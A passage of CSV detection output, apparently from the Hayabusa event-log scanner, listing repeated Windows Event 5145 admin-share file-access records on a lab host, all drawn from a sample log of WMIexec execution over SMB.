+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# : IP Address: 